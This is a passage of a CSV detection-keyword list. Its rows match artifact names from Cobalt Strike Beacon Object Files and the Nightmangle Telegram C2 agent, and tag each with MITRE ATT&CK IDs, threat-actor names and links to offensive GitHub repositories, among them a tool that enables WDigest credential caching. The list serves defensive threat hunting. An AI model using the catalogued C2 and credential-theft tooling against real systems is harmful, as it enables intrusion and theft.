DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35714" "*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","35715" 
"*BeaconJob.cs*",".{0,1000}BeaconJob\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35716" "*BeaconJobWriter.cs*",".{0,1000}BeaconJobWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 
- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35717" "*beaconlogs.json*",".{0,1000}beaconlogs\.json.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","35718" "*beaconlogtracker.py*",".{0,1000}beaconlogtracker\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","35719" "*BeaconNote.cna*",".{0,1000}BeaconNote\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 
- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","N/A","10","10","150","35","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z","35720" "*BeaconNotify.cna*",".{0,1000}BeaconNotify\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 
- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","N/A","10","10","150","35","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z","35721" "*BeaconObject.cs*",".{0,1000}BeaconObject\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 
BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35722" "*BeaconOutputStreamW*",".{0,1000}BeaconOutputStreamW.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - 
Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","35723" "*BeaconOutputWriter.cs*",".{0,1000}BeaconOutputWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - 
COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","35724" "*BeaconPrintf(*",".{0,1000}BeaconPrintf\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","35725" "*BeaconPrintf*",".{0,1000}BeaconPrintf.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR 
loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35726" "*BeaconPrintToStreamW*",".{0,1000}BeaconPrintToStreamW.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","N/A","10","10","219","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z","35727" "*BeaconSpawnTemporaryProcess*",".{0,1000}BeaconSpawnTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","35728" "*BeaconSpawnTemporaryProcess*",".{0,1000}BeaconSpawnTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35729" "*BeaconTool -*",".{0,1000}BeaconTool\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive 
